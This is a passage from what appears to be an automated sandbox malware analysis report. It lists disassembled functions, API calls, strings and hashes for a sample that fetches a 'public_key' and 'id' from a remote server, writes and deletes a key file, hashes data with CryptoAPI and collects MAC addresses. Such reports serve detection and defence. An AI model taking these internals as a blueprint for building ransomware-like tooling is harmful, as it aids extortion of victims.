904->911 914 41eca0-41eca8 906->914 915 41ece3-41eced 907->915 916 41ecdf-41ece1 907->916 909->895 924 41ef12-41ef4c call 413ff0 call 412900 909->924 910->909 911->783 933 41e9e9 913->933 919 41ecbb 914->919 920 41ecaa-41ecb7 lstrlenA 914->920 922 41ecf0-41ecf5 915->922 921 41ecf9-41ed1b call 4156d0 call 412900 916->921 919->907 920->914 926 41ecb9 920->926 936 41ed1d 921->936 937 41ed1f-41ed35 lstrcpyW 921->937 922->922 927 41ecf7 922->927 941 41ef50-41ef68 lstrcpyW 924->941 942 41ef4e 924->942 926->907 927->921 933->883 936->937 939 41ed43-41edab lstrlenA call 420c62 call 42b420 MultiByteToWideChar lstrcpyW lstrlenW 937->939 940 41ed37-41ed40 call 422587 937->940 957 41edad-41edb6 lstrlenW 939->957 958 41edbc-41edc1 939->958 940->939 945 41ef76-41efb3 call 413ff0 call 412900 941->945 946 41ef6a-41ef73 call 422587 941->946 942->941 961 41efb5 945->961 962 41efb7-41efc6 lstrcpyW 945->962 946->945 957->958 963 41ee44-41ee48 957->963 959 41ee10-41ee12 958->959 960 41edc3-41ede4 SHGetFolderPathA 958->960 965 41ee14-41ee15 call 420bed 959->965 966 41ee1d-41ee1f 959->966 960->784 964 41edea-41ee0b PathAppendA DeleteFileA 960->964 961->962 967 41efd4-41efe0 962->967 968 41efc8-41efd1 call 422587 962->968 969 41f01a-41f030 963->969 964->783 975 41ee1a 965->975 966->803 971 41ee21-41ee27 call 420bed 966->971 973 41efe2-41efeb call 422587 967->973 974 41efee-41f008 967->974 968->967 971->803 973->974 979 41f016 974->979 980 41f00a-41f013 call 422587 974->980 975->966 979->969 980->979
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • timeGetTime.WINMM(?,?,?,?,?,004CB3EC,000000FF), ref: 0041E6C0
                                                                                                                                                                                                                                          • Part of subcall function 0040C6A0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,0041E6D4), ref: 0040C6C2
                                                                                                                                                                                                                                          • Part of subcall function 0040C6A0: RegQueryValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
                                                                                                                                                                                                                                          • Part of subcall function 0040C6A0: RegCloseKey.ADVAPI32(00000000), ref: 0040C700
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 0041E707
                                                                                                                                                                                                                                          • Part of subcall function 0040C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 0040C51B
                                                                                                                                                                                                                                        • InternetOpenW.WININET ref: 0041E743
                                                                                                                                                                                                                                        • _wcsstr.LIBCMT ref: 0041E7AE
                                                                                                                                                                                                                                        • _memmove.LIBCMT ref: 0041E838
                                                                                                                                                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 0041E90A
                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,&first=false), ref: 0041E93D
                                                                                                                                                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0041E954
                                                                                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0041E96F
                                                                                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041E98C
                                                                                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041E9A3
                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0041E9CD
                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0041E9F3
                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0041E9F6
                                                                                                                                                                                                                                        • _strstr.LIBCMT ref: 0041EA36
                                                                                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EA59
                                                                                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EA74
                                                                                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0041EA82
                                                                                                                                                                                                                                        • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0041EA92
                                                                                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 0041EAA4
                                                                                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 0041EABA
                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0041EAC8
                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(00000022), ref: 0041EAE3
                                                                                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 0041EB5B
                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0041EB7C
                                                                                                                                                                                                                                        • _malloc.LIBCMT ref: 0041EB86
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 0041EB94
                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0041EBAE
                                                                                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 0041EBB6
                                                                                                                                                                                                                                        • _strstr.LIBCMT ref: 0041EBDA
                                                                                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EC00
                                                                                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EC24
                                                                                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0041EC32
                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 0041EC3E
                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(","id":"), ref: 0041EC51
                                                                                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 0041EC6D
                                                                                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 0041EC7F
                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0041EC93
                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(00000022), ref: 0041ECB3
                                                                                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 0041ED2A
                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0041ED4B
                                                                                                                                                                                                                                        • _malloc.LIBCMT ref: 0041ED55
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 0041ED63
                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 0041ED7D
                                                                                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 0041ED85
                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 0041EDA3
                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 0041EDAE
                                                                                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EDD3
                                                                                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EDF7
                                                                                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0041EE05
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041EE15
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0041EE22
                                                                                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 0041EF61
                                                                                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 0041EFBF
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: lstrlen$lstrcpy$Path$FolderInternet$AppendFile$CloseDeleteOpen_memset$ByteCharHandleMultiWide_free_malloc_strstr$QueryReadTimeValue_memmove_wcsstrlstrcattime
                                                                                                                                                                                                                                        • String ID: "$","id":"$&first=false$&first=true$.bit/$?pid=$Microsoft Internet Explorer$bowsakkdestx.txt${"public_key":"
                                                                                                                                                                                                                                        • API String ID: 704684250-3586605218
                                                                                                                                                                                                                                        • Opcode ID: 289dd5a793ff2a70386e50dc1b6c4b20b28807b8306f310851138377f97b1acb
                                                                                                                                                                                                                                        • Instruction ID: 6dbc96f3ccd93c00a013485041b5c7257b0a9ae09bebbc57280f72cccf7ce4d8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 289dd5a793ff2a70386e50dc1b6c4b20b28807b8306f310851138377f97b1acb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FA421771508341ABD720DF25DC45BDB7BE8BF85308F44092EF88587292DB78E589CB9A
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00410FC0 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 149encryptionstringCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00411010
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00411026
                                                                                                                                                                                                                                          • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,0044F26B,?,?,00000000,?,?,?,?,0044F26B,?,005081FC,?), ref: 00430F1F
                                                                                                                                                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0041103B
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00411051
                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(?,00000000), ref: 00411059
                                                                                                                                                                                                                                        • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00411064
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0041107A
                                                                                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00411099
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 004110AB
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 004110CA
                                                                                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 004110DE
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 004110F0
                                                                                                                                                                                                                                        • _malloc.LIBCMT ref: 00411100
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 0041110B
                                                                                                                                                                                                                                        • _sprintf.LIBCMT ref: 0041112E
                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 0041113C
                                                                                                                                                                                                                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 00411154
                                                                                                                                                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0041115F
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                                                                                                                                                                                                                                        • String ID: %.2X
                                                                                                                                                                                                                                        • API String ID: 2451520719-213608013
                                                                                                                                                                                                                                        • Opcode ID: 701b5aa673cf7074269e6fc8cae5c71a5e5e2f052b68314f1411064e4ba296ee
                                                                                                                                                                                                                                        • Instruction ID: afcee35d8fffc0279d29cc69f214b0122642615a52b78f57353c1cfd92a6c2ef
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 701b5aa673cf7074269e6fc8cae5c71a5e5e2f052b68314f1411064e4ba296ee
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 92516171E40219BBDB10DBE5DC46FEFBBB8FB08704F14012AFA05B6291D77959018BA9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0040F730 Relevance: 29.2, APIs: 19, Instructions: 732COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411ACA
                                                                                                                                                                                                                                          • Part of subcall function 00411AB0: DispatchMessageW.USER32(?), ref: 00411AE0
                                                                                                                                                                                                                                          • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411AEE
                                                                                                                                                                                                                                        • PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF,?,00000000), ref: 0040F900
                                                                                                                                                                                                                                        • _memmove.LIBCMT ref: 0040F9EA
                                                                                                                                                                                                                                        • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0040FA51
                                                                                                                                                                                                                                        • _memmove.LIBCMT ref: 0040FADA
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 273148273-0
                                                                                                                                                                                                                                        • Opcode ID: 5ec0d9724f872f20c0a3311e32d0d83cc480b5567d2bc2585d23dc0cacd294ba
                                                                                                                                                                                                                                        • Instruction ID: a2fe25dd57492d494e78aebb36a96054b80ce25314fb01b08d1ce03a62da89f0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5ec0d9724f872f20c0a3311e32d0d83cc480b5567d2bc2585d23dc0cacd294ba
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D652A271D00208DBDF20DFA4D985BDEB7B4BF05308F10817AE419B7291D779AA89CB99
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0040E870 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 165encryptionCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 1515 40e870-40e8d6 call 4156d0 CryptAcquireContextW 1518 40e8d8-40e8e4 call 430eca 1515->1518 1519 40e8e9-40e901 CryptCreateHash 1515->1519 1518->1519 1521 40e903-40e90f call 430eca 1519->1521 1522 40e914-40e930 CryptHashData 1519->1522 1521->1522 1523 40e932-40e93e call 430eca 1522->1523 1524 40e943-40e961 CryptGetHashParam 1522->1524 1523->1524 1527 40e963-40e96f call 430eca 1524->1527 1528 40e974-40e9a6 call 420be4 call 42b420 CryptGetHashParam 1524->1528 1527->1528 1534 40e9a8-40e9b4 call 430eca 1528->1534 1535 40e9b9-40e9bb 1528->1535 1534->1535 1537 40e9c0-40e9c3 1535->1537 1538 40ea10-40ea31 call 422110 CryptDestroyHash CryptReleaseContext 1537->1538 1539 40e9c5-40e9df call 4204a6 1537->1539 1546 40ea33-40ea3b call 422587 1538->1546 1547 40ea3e-40ea50 1538->1547 1544 40e9e1-40e9f0 call 413ea0 1539->1544 1545 40e9f2-40e9f5 1539->1545 1544->1537 1549 40e9f8-40e9fd 1545->1549 1546->1547 1549->1549 1552 40e9ff-40ea0e call 413ea0 1549->1552 1552->1537
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000), ref: 0040E8CE
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040E8E4
                                                                                                                                                                                                                                          • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,0044F26B,?,?,00000000,?,?,?,?,0044F26B,?,005081FC,?), ref: 00430F1F
                                                                                                                                                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040E8F9
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040E90F
                                                                                                                                                                                                                                        • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 0040E928
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040E93E
                                                                                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040E95D
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040E96F
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 0040E98E
                                                                                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040E9A2
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040E9B4
                                                                                                                                                                                                                                        • _sprintf.LIBCMT ref: 0040E9D3
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                                                                                                                                                                                                                                        • String ID: %.2X
                                                                                                                                                                                                                                        • API String ID: 1084002244-213608013
                                                                                                                                                                                                                                        • Opcode ID: 2a2c6309cc7f3088b6ad090895b6028a962ed151306464ff2d3e3b9a596104f8
                                                                                                                                                                                                                                        • Instruction ID: 6020eefb82f776eec2353dc0ff897aa1862dcd4ecc30860888fbdadc8ba65bc1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2a2c6309cc7f3088b6ad090895b6028a962ed151306464ff2d3e3b9a596104f8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 835173B1E40209EBDF11DFA2DC46FEEBB78EB04704F10452AF501B61C1D7796A158BA9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0040EAA0 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 159encryptionCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 1556 40eaa0-40eb09 call 4156d0 CryptAcquireContextW 1559 40eb0b-40eb17 call 430eca 1556->1559 1560 40eb1c-40eb34 CryptCreateHash 1556->1560 1559->1560 1562 40eb36-40eb42 call 430eca 1560->1562 1563 40eb47-40eb56 CryptHashData 1560->1563 1562->1563 1564 40eb58-40eb64 call 430eca 1563->1564 1565 40eb69-40eb87 CryptGetHashParam 1563->1565 1564->1565 1568 40eb89-40eb95 call 430eca 1565->1568 1569 40eb9a-40ebcc call 420be4 call 42b420 CryptGetHashParam 1565->1569 1568->1569 1575 40ebce-40ebda call 430eca 1569->1575 1576 40ebdf 1569->1576 1575->1576 1578 40ebe1-40ebe4 1576->1578 1579 40ebe6-40ec00 call 4204a6 1578->1579 1580 40ec38-40ec67 call 422110 CryptDestroyHash CryptReleaseContext 1578->1580 1585 40ec02-40ec11 call 413ea0 1579->1585 1586 40ec13-40ec19 1579->1586 1585->1578 1588 40ec20-40ec25 1586->1588 1588->1588 1590 40ec27-40ec36 call 413ea0 1588->1590 1590->1578
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000,00000000,?), ref: 0040EB01
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040EB17
                                                                                                                                                                                                                                          • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,0044F26B,?,?,00000000,?,?,?,?,0044F26B,?,005081FC,?), ref: 00430F1F
                                                                                                                                                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040EB2C
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040EB42
                                                                                                                                                                                                                                        • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 0040EB4E
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040EB64
                                                                                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040EB83
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040EB95
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 0040EBB4
                                                                                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040EBC8
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040EBDA
                                                                                                                                                                                                                                        • _sprintf.LIBCMT ref: 0040EBF4
                                                                                                                                                                                                                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 0040EC44
                                                                                                                                                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0040EC4F
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                                                                                                                                                                                                                                        • String ID: %.2X
                                                                                                                                                                                                                                        • API String ID: 1637485200-213608013
                                                                                                                                                                                                                                        • Opcode ID: 93922072d48d22cd6d6b6ae8233d720f7ababcdf9d90782a77bd94aa60d24f48
                                                                                                                                                                                                                                        • Instruction ID: 14d7d02cf3c54262bdef7e6fa07b3cadf7b2b7504ea62fb0b9d39e8d8664034d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 93922072d48d22cd6d6b6ae8233d720f7ababcdf9d90782a77bd94aa60d24f48
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A6515371E40209ABDF11DBA6DC46FEFBBB8EB04704F14052AF505B62C1D77969058BA8
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0040E670 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 78COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 1593 40e670-40e697 call 420c62 * 2 1598 40e6b4-40e6c2 GetAdaptersInfo 1593->1598 1599 40e699-40e6b3 call 421f2d call 420bed 1593->1599 1600 40e6c4-40e6d9 call 420bed call 420c62 1598->1600 1601 40e6db-40e6e8 GetAdaptersInfo 1598->1601 1600->1599 1600->1601 1604 40e744-40e754 call 420bed 1601->1604 1605 40e6ea-40e73c call 4204a6 call 421f2d * 2 1601->1605 1619 40e741 1605->1619 1619->1604
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _malloc.LIBCMT ref: 0040E67F
                                                                                                                                                                                                                                          • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                                                                                                                                                          • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                                                                                                                                                          • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(005A0000,00000000,00000001,00000000,00000000,00000000,?,00428CF4,00000000,00000000,00000000,00000000,?,00428BE1,00000018,00507BD0), ref: 00420CA5
                                                                                                                                                                                                                                        • _malloc.LIBCMT ref: 0040E68B
                                                                                                                                                                                                                                        • _wprintf.LIBCMT ref: 0040E69E
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0040E6A4
                                                                                                                                                                                                                                          • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042500D,?,00423F7C,?,0041E6CC,00000000), ref: 00420C01
                                                                                                                                                                                                                                          • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042500D,?,00423F7C,?,0041E6CC,00000000,?,?,?,?,?,004CB3EC), ref: 00420C13
                                                                                                                                                                                                                                        • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6B9
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0040E6C5
                                                                                                                                                                                                                                        • _malloc.LIBCMT ref: 0040E6CD
                                                                                                                                                                                                                                        • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6E0
                                                                                                                                                                                                                                        • _sprintf.LIBCMT ref: 0040E720
                                                                                                                                                                                                                                        • _wprintf.LIBCMT ref: 0040E732
                                                                                                                                                                                                                                        • _wprintf.LIBCMT ref: 0040E73C
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0040E745
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 0040E71A
                                                                                                                                                                                                                                        • Address: %s, mac: %s, xrefs: 0040E72D
                                                                                                                                                                                                                                        • Error allocating memory needed to call GetAdaptersinfo, xrefs: 0040E699
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
                                                                                                                                                                                                                                        • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
